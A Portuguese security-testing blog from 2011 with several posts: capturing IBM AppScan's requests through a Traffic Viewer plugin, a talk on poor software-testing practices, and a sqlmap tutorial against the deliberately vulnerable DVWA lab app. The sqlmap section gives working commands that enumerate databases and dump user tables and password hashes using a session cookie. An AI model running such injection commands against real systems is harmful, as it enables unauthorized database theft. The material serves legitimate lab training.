Pesquisar este blog

segunda-feira, 26 de dezembro de 2011

Como Capturar as requisições que AppScan gera.

A ferramenta AppScan não mostra as requisições enviadas, só as que ele encontra vulnerabilidades, tentei realizar através do fiddler, mas a quantidade gerada é tão grande que chegou a travar, pesquisando bastante encontrei um Plugins que pode ser adicionado a ferramenta, podendo realizar essa função.

Passos:
1. Baixe o Arquivo abaixo:
http://www.4shared.com/zip/gsmjUppS/AppScanRepPpt-bin-12.html
2. Instale o Executável TrafficViewerSetup.msi
3. Instale o Plugin pela AppScan
  3.1 - No menu Tools, em Extensions, clique em Extension Manager


  3.2 -  Na Tela do Extesion Manager clique em Install, selecione o arquivo baixado TrafficViewerAppScanExtension.zip, clique em "Ok", para instalar, posteriormente reinicie o AppScan.

4. Configurar o Proxy
  4.1 - Agora temos que adicionar o proxy no AppScan e no Traffic Viewer, para isso precisamos abrir os dois programas.


 Em Tools, depois em options, configure o proxy.

No menu Scan do AppScan, clique em Scan Configuration, na parte de Connection selecione "Communication and Proxy", digite o endereço e a porta do seu proxy.

Ao Clicar em "Tail", começa a capturar o Trafico, ao clicar em "Stop", vai parar a captura do trafico.

  4.2 Ao realizar seus testes no AppScan, seram capturados as requisições pelo Traffic Viewer, sendo necessário configurar os dois aplicativos ao mesmo tempo antes de realizar os testes. Pra que capturar as resquisições? Primeiro é essencial a pessoa entender como a AppScan faz os testes e como ela muda as requisições, que tipo de testes ela está fazendo, no eventual problema é necessário tentar reproduzir e entender o erro, verificando as requisições que o AppScan enviou.

quinta-feira, 15 de dezembro de 2011

Tutorial Avançado da Ferrramenta IBM AppScan



Fiz um Tutorial Avançado da Ferramenta, para aqueles que sentirem dificuldade na sua execução, a ferramenta não faz milagres, é necessário um profissional que saiba manuseá-la e entenda de segurança, o manual é de grande ajuda na realização dos testes, muitos dos Passos foram remendações dos consultores da IBM.




Link do Tutorial em PDF:

http://www.4shared.com/document/E4sNW8m9/Tutorial_Avancado_com_AppScan.html

Tutorial em Vídeo:

http://www.4shared.com/video/jJlE1OA-/projAppScan.html




terça-feira, 13 de dezembro de 2011

Curso de Auditoria de Segurança em Aplicações Web baseado na OWASP

O Curso vai ser Apresentado em Manaus entre os Meses de Março e Julho de 2012 na SOFTESTE.

BRATESTE - Piores Práticas em Testes de Software (e como evitá-las)




Na minha opinião, não existem melhores práticas universais para testes de software (e mesmo para
as demais disciplinas da engenharia de software). Porém podemos aprender com os erros dos outros
e evitar cair nas mesmas ciladas. Abaixo seguem algumas experiências que eu tive e que me
trouxeram problemas no passado. São trechos da apresentação realizada no Brateste. Para acessar
a apresentação completa, utilize o link ao final do artigo.

1. Deixar os testes para o final do projeto
Testes fazem parte do ciclo de vida do projeto e devem ser considerados desde o início. Infelizmente,
essa prática ainda não é adotada em todas as organizações, e quando deixamos os testes para o
final do projeto, o que costuma ocorrer é: os testes são comprimidos ou deixam de ser executados.
Mais grave ainda é que a importância dos testes reduz, pois normalmente próximo ao final do projeto,
a expectativa é de que não hajam defeitos - qualquer defeito encontrado pode significar um atraso na
implantação.

Para evitar essa má prática: os testes devem iniciar junto com o projeto e os
testadores devem fazer parte da equipe e colaborar com o desenvolvimento
(whole team). No início do projeto, o foco é no planejamento e no design dos
testes. Temos que manter a rastreabilidade dos produtos de trabalho de testes
com os demais produtos de desenvolvimento. Também podemos incluir requisitos
que facilitem a testabilidade do sistema (se deixarmos para o final do
projeto, é muito mais difícil que esses requisitos sejam implementados). Para
evitar essa má prática, o desenvolvimento iterativo é a chave para que os
testes não sejam executados só no final do projeto - devemos ter ciclos de
execução dos testes a cada iteração.

2. Buscar 100% de automação dos testes
Uma ilusão perseguida por muitas empresas que focam em testes é automatizar todos os testes de um
sistema. Chamo isso de ilusão pois sequer é possível definir quais são todos os testes possíveis para
um sistema. Além disso, essa prática é pouco benéfica para o principal objetivo dos testes - encontrar
defeitos. Muitas tentativas de automatizar os testes acabam criando um monstro - um conjunto de
scripts de automação difícil de ser mantido e pouco eficiente em encontrar novos defeitos (o teste só
vai ser automatizado se o software estiver funcionando - e portanto só vai encontrar defeitos se algo
que estava funcionando deixe de funcionar).

Para evitar essa má prática: a automação dos testes pode ser muito benéfica em
alguns casos (como por exemplo no desenvolvimento iterativo ou em métodos
ágeis - para ajudar nos testes de regressão). Mas a automação sozinha não deve
responder por encontrar os defeitos do sistema. Na prática executamos testes
manuais para encontrar a maior parte dos defeitos e automatizamos os cenários
que trazem algum ganho para a empresa, por exemplo: tarefas repetitivas,
principais cenários de utilização do sistema para teste de regressão, etc.
Também devemos considerar a automação de outras tarefas relacionados com teste
tais como a gerência dos testes e o reporte de defeitos. Em resumo: evite dar
toda atenção à automação e não esqueça da principal tarefa dos teste: evitar
que defeitos sejam encontrados pelos usuários da aplicação.

3. Focar nas evidências dos testes
Testadores detalhistas, empresas com níveis de controle muito altos e gerentes com uma visão
distorcida dos testes, costumam cobrar documentações detalhadas dos testes.Ás vezes o foco na documentação
ofusca o real trabalho dos testes. Os testadores devem encontrar defeitos e impedir
que esses defeitos sejam encontrados por clientes. Evidenciar os testes é uma conseqüência do
trabalho dos testadores. Documentações muito elaboradas, padrões, níveis de maturidade são menos
importantes do que encontrar defeitos.

Para evitar essa má prática: ter uma documentação detalhada dos testes não
chega a ser uma má prática se não tirar o foco dos testes de encontrar
defeitos. Meça a produtividade da equipe de testes: quantas horas são
necessárias para encontrar 1 defeito? Quantos defeitos são encontrados e
corrigidos antes que o software chegue em produção? Qual é o valor dos testes
para sua organização e de que forma eles ajudam na qualidade do projeto?


Artigo por FelipeFreire palestrado na BRATESTE
O evento, focado em testes, contou com cerca de 200
participantes e foram abordados tópicos atuais sobre os
testes de software, tais como: Agile, frameworks e
ferramentas de testes, tendências, etc. Contou com
palestrantes internacionais, autores de livros de referência para a área de testes, tais como Lee Copeland, Martin
Pol e Janet Gregory (Test Design Technics, TMap e Agile Testing).

Slides da Palestra:


Materia no jornal sobre a Empresa que Trabalho, em 2007.

segunda-feira, 12 de dezembro de 2011

Usando o SQLMAP na aplicação DVWA de Teste


Sqlmap é uma ferramenta open source para penetration test que automatiza o processo de detecção e exploiting de vulnerabilidades a Sqli Injection, é escrita em python e tem suporte tanto GNU linux ou windows.” O sqlmap além de oferecer as funções para detectar e explorar as vulnerabilidades a SQLI, ele consegue também tentar “dominar” o sistema de banco de dados se for possivel.


Comandos Principais do SQLMAP
Identificar banco:
./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" -b
Bases:
--current-db -> mostra a atual
--dbs -> lista as bases
Tabelas:
-D [banco]
--tables -> lista as tabelas
Colunas:
-D [banco]
-T [tabela]
--columns -> lista as colunas
Valores:
-D [banco]
-T [tabel]
-C [coluna]
--dump -> extrai os valores

EXEMPLO UTILIZANDO A APLICAÇÃO DVWA PARA TESTE DE SEGURANÇA.

> Primeiro deve-se pegar a URL do sistema, aonde deseja fazer a injeção, segundo pega os dados do PHPSESSID

--> Verifica a Versão do Banco
python sqlmap.py -u 'http://192.168.12.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie 'PHPSESSID=vug5ogmej1lmsd1unlqmd2fmu1; security=low' --string='Surname' --dbs

--> Verifica a tabela users
python sqlmap.py -u 'http://192.168.12.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie 'PHPSESSID=vug5ogmej1lmsd1unlqmd2fmu1; security=low' --string='Surname' -T users --columns

---------------------------------------------- descriptografa os dados da tabela users ----

python sqlmap.py -u 'http://192.168.12.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie 'PHPSESSID=vug5ogmej1lmsd1unlqmd2fmu1; security=low' --string='Surname' --dump ---users

python sqlmap.py -u 'http://192.168.12.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie 'PHPSESSID=vug5ogmej1lmsd1unlqmd2fmu1; security=low' --string='Surname' --passwords -v 1

python sqlmap.py -u 'http://192.168.12.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie 'PHPSESSID=vug5ogmej1lmsd1unlqmd2fmu1; security=low' --string='Surname' --columns \
-D testdb -T users -C name

http://www.4shared.com/document/A6uqCxmO/SQLmapManual.html

  • Videos no Youtube

 http://www.youtube.com/watch?v=4qO8kOeU54o
 http://www.youtube.com/watch?v=hvjN3p207rw